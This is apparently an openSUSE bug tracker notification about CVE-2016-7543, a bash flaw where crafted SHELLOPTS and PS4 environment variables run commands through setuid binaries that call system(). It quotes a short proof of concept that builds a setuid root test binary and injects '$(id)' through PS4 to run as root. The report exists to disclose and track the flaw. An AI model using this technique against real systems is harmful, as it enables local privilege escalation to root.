http://bugzilla.suse.com/show_bug.cgi?id=1001299 Bug ID: 1001299 Summary: VUL-0: CVE-2016-7543: bash SHELLOPTS+PS4 Classification: openSUSE Product: openSUSE Distribution Version: Leap 42.1 Hardware: Other OS: Other Status: NEW Severity: Normal Priority: P5 - None Component: Security Assignee: security-team@suse.de Reporter: mikhail.kasimov@gmail.com QA Contact: qa-bugs@suse.de Found By: --- Blocker: --- Reference: http://seclists.org/oss-sec/2016/q3/617 =================== The recent bash 4.4 patched an old attack vector regarding specially crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries using system()/popen(). https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html "nn. Shells running as root no longer inherit PS4 from the environment, closing a security hole involving PS4 expansion performing command substitution." # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }' # chmod 4755 ./test # ls -l ./test -rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test # exit $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test uid=0(root) Sat Sep 10 18:06:36 WET 2016 Sorry Tavis :P ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. =================== I've tried to reproduce this issue on release bash version in 42.1 -- 4.2.47(1)-release (x86_64-suse-linux-gnu) -- but first line (gcc -xc...) returned command line dialogue instead of test-file. So, please, try to reproduce this on your own side this issue. Thanks! -- You are receiving this mail because: You are on the CC list for the bug.